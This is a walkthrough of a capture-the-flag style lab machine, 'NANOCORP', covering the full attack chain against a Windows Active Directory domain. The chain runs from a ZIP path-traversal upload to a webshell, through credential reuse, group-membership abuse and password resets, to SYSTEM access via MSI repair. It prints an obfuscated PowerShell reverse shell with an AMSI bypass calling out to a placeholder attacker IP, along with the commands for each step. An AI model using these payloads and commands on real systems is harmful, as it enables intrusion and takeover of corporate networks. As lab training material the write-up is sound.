Introduction

NANOCORP is a Windows Active Directory machine designed to teach realistic enterprise exploitation techniques. The box focuses on:

• Web Application Security: Exploiting CVE-2025-24054 in a ZIP file upload system to gain initial access
• Active Directory Enumeration: Using BloodHound to map domain relationships and identify privilege escalation paths
• Group-Based Privilege Escalation: Leveraging AD group memberships to escalate privileges through the IT_SUPPORT group
• Windows Privilege Escalation: Exploiting MSI repair functionality to achieve SYSTEM-level access

This machine simulates a corporate hiring portal environment where a file upload vulnerability leads to initial access, followed by careful AD enumeration and exploitation of group permissions to achieve domain administrator privileges.

Info for HTB

Access

Passwords:

Key Processes

Web Server (Port 80):

• Apache 2.4.58 with PHP 8.2.12 running on Windows
• Hosts main website at nanocorp.htb
• Hosts hiring portal at hire.nanocorp.htb
• ZIP upload functionality at /upload.php on hire subdomain
• Intentionally vulnerable to CVE-2025-24054 (path traversal during ZIP extraction)

Active Directory Services:

• DNS (Port 53): Standard Windows DNS server
• Kerberos (Port 88): Windows Kerberos authentication service
• LDAP (Port 389): Active Directory LDAP for domain queries
• SMB (Port 445): File sharing and remote administration
• RDP (Port 3389): Remote Desktop Protocol
• WinRM (Port 5986): Secure PowerShell remoting (SSL)

Web Application Configuration:

• Database credentials stored in C:\xampp\htdocs\config.php
• Credentials match domain service account web_svc

Automation / Crons

MSI Repair Service:

• What: Automated task that monitors and executes MSI repair operations
• Why: Required for the final privilege escalation exploit path
• How: Monitors C:\Windows\Temp for files matching pattern cmk_all_*_1.cmd and executes them with SYSTEM privileges during MSI repair operations
• Runs: Triggered by MSI repair commands (msiexec /fa)

Firewall Rules

Standard Windows Firewall with default AD domain controller rules. All enumerated ports (53, 80, 88, 135, 139, 389, 445, 3389, 5986) are accessible.

Other

Active Directory Structure:

• Domain: nanocorp.htb
• Domain Controller: dc01.nanocorp.htb
• Key Security Groups:
  • IT_SUPPORT: Has ForceChangePassword rights over monitoring_svc user
  • MONITORING: Members have WinRM access to the domain controller
• The web_svc user has the ability to add itself to the IT_SUPPORT group

BloodHound Attack Path:

web_svc (GenericAll on IT_SUPPORT) → IT_SUPPORT (ForceChangePassword on monitoring_svc) → monitoring_svc (WinRM to DC)

File Locations:

• User flag: C:\Users\monitoring_svc\Desktop\user.txt
• Root flag: C:\Users\Administrator\Desktop\root.txt

Enumeration

Nmap Scan

We start by scanning the target to identify open ports and running services:

nmap -sC -sV -p- -T4 10.129.130.44

Results:

53/tcp   open  domain        (generic dns response: SERVFAIL)
80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Nanocorp
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-11-12 15:22:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services

Key Findings:

• Windows Active Directory environment (Kerberos on 88, LDAP on 389, SMB on 445)
• Web server running Apache with PHP on port 80
• Domain name discovered: nanocorp.htb
• RDP available on port 3389

Add the domain to /etc/hosts:

echo "10.129.130.44 nanocorp.htb dc01.nanocorp.htb" | sudo tee -a /etc/hosts

Web Enumeration

Browsing to http://nanocorp.htb shows a corporate website for Nanocorp. Through enumeration, we discover a subdomain: hire.nanocorp.htb.

Add to /etc/hosts:

echo "10.129.130.44 hire.nanocorp.htb" | sudo tee -a /etc/hosts

The hiring portal at http://hire.nanocorp.htb contains a job application system with file upload functionality that accepts ZIP files.

Foothold

CVE-2025-24054 - ZIP Path Traversal Exploitation

The ZIP file upload system on the hire portal is vulnerable to CVE-2025-24054, a path traversal vulnerability during ZIP extraction that allows writing files to arbitrary locations on the server.

Exploit Repository:

https://github.com/reloc2/CVE-2025-24054

Using this exploit, we can upload a malicious ZIP file that extracts a webshell to the web root directory.

After uploading the malicious ZIP through the hire portal, we successfully deploy a webshell and gain command execution on the target.

Credential Discovery

Through the webshell, we enumerate the web application's configuration files and discover database credentials in the configuration:

Credentials Found:

web_svc : dksehdgh712!@#

These credentials turn out to be valid domain credentials for the web_svc service account.

Verify Domain Access

We verify the discovered credentials work for domain authentication:

netexec smb dc01.nanocorp.htb -u 'web_svc' -p 'dksehdgh712!@#' --users

The credentials are valid! We now have authenticated access to the domain as web_svc.

Lateral Movement

Active Directory Enumeration

With valid domain credentials, we proceed to enumerate the Active Directory environment.

User Enumeration

netexec smb dc01.nanocorp.htb -u 'web_svc' -p 'dksehdgh712!@#' --users

BloodHound Data Collection

Synchronize time with the domain controller (required for Kerberos authentication):

ntpdate nanocorp.htb

Collect Active Directory data using RustHound:

rusthound-ce -d nanocorp.htb -f dc01.nanocorp.htb -z -u web_svc -p 'dksehdgh712!@#'

This generates a ZIP file containing the domain's relationships and permissions.

BloodHound Analysis

Import the collected data into BloodHound to visualize attack paths.

Critical Findings:

1. web_svc → IT_SUPPORT: The web_svc user can add itself to the IT_SUPPORT group
2. IT_SUPPORT → monitoring_svc: Members of IT_SUPPORT have ForceChangePassword rights over the monitoring_svc user
3. monitoring_svc → Domain Controller: The monitoring_svc user is a member of the MONITORING group, which has WinRM access to the domain controller

Attack Path Identified:

web_svc → Add to IT_SUPPORT → Reset monitoring_svc password → WinRM to DC as monitoring_svc

Privilege Escalation to monitoring_svc

Step 1: Add web_svc to IT_SUPPORT Group

bloodyAD --host DC01.nanocorp.htb -d nanocorp.htb -u web_svc -p 'dksehdgh712!@#' add groupMember IT_SUPPORT web_svc

Step 2: Reset monitoring_svc Password

Now that we're a member of IT_SUPPORT, we can reset the monitoring_svc password:

bloodyAD --host DC01.nanocorp.htb -d nanocorp.htb -u web_svc -p 'dksehdgh712!@#' set password MONITORING_SVC 'Pass@123!'

Step 3: Obtain Kerberos Ticket

Synchronize time with the domain controller:

ntpdate nanocorp.htb

Request a Kerberos TGT for monitoring_svc:

impacket-getTGT nanocorp.htb/monitoring_svc:'Pass@123!' -dc-ip 10.129.130.44

If you encounter "Clock skew too great" error:

DC_TIME=$(sudo ntpdate -q 10.129.130.44 | grep "time server" | awk '{print $10}')
faketime '2025-11-12 13:00:00' impacket-getTGT nanocorp.htb/monitoring_svc:'Pass@123!' -dc-ip 10.129.130.44

This generates a .ccache file containing our Kerberos ticket.

Step 4: WinRM Access

Export the Kerberos ticket and connect to the domain controller via WinRM:

export KRB5CCNAME=*.ccache
python3 winrmexec.py -ssl -port 5986 NANOCORP.HTB/monitoring_svc:'Pass@123!'@dc01.nanocorp.htb -k

We successfully gain shell access as monitoring_svc!

User Flag

Once connected via WinRM as monitoring_svc:

type C:\Users\monitoring_svc\Desktop\user.txt

Privilege Escalation

MSI Repair Exploitation

As monitoring_svc, we can exploit Windows MSI repair functionality to execute arbitrary commands as SYSTEM.

Vulnerability Context:
The MSI repair process searches for specific command files in C:\Windows\Temp following the naming pattern cmk_all_*_1.cmd and executes them with SYSTEM privileges.

Step 1: Create Reverse Shell Payload

On the target system as monitoring_svc, create the payload file:

$newPayload = @'
@echo off powershell.exe -NoP -W Hidden -Exec Bypass -c "[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true);$c=New-Object Net.Sockets.TCPClient('IP_HERE',PORT);$s=$c.GetStream();[byte[]]$b=0..65535|%%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$x=([text.encoding]::ASCII).GetBytes($o);$s.Write($x,0,$x.Length);$s.Flush()};$c.Close()"
'@

$newPayload | Out-File C:\ProgramData\shell.cmd -Encoding ASCII -Force

Note: Replace IP_HERE with your VPN IP address and PORT with your listener port.

Step 2: Create Multiple Trigger Files

Generate numerous files matching the MSI repair pattern:

500..10000 | foreach {copy C:\ProgramData\shell.cmd C:\Windows\Temp\cmk_all_${_}_1.cmd;Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;}

This creates thousands of files that will be detected and executed by the MSI repair process.

Step 3: Set Up Listener

On your attack machine, start a netcat listener:

nc -lvnp PORT

Replace PORT with the same port number used in your payload.

Step 4: Trigger MSI Repair

Initiate an MSI repair operation:

msiexec /fa C:\Windows\Installer\387d1.msi

The repair process will execute our payload files with SYSTEM privileges!

Root Flag

When the reverse shell connects back, you'll have SYSTEM access:

whoami

Output: nt authority\system

Retrieve the root flag:

type C:\Users\Administrator\Desktop\root.txt

Success! NANOCORP has been completely compromised.

Summary

Attack Chain

1. Discovered hire.nanocorp.htb subdomain with file upload functionality
2. Exploited CVE-2025-24054 (ZIP path traversal) to deploy webshell
3. Extracted web_svc credentials from web application configuration
4. Performed Active Directory enumeration using BloodHound
5. Identified privilege escalation path through IT_SUPPORT group
6. Added web_svc to IT_SUPPORT group using existing permissions
7. Reset monitoring_svc password using ForceChangePassword rights
8. Obtained Kerberos ticket and connected via WinRM as monitoring_svc
9. Exploited MSI repair functionality to execute commands as SYSTEM
10. Retrieved both user and root flags

Key Techniques

• Path Traversal via ZIP Extraction: CVE-2025-24054
• Active Directory Enumeration: BloodHound, RustHound, NetExec
• Kerberos Authentication: TGT acquisition and usage
• Group-Based Privilege Escalation: Leveraging AD group permissions
• Windows MSI Repair Exploitation: Achieving SYSTEM access

Acknowledgments

Thanks, Artemis Community 🛡️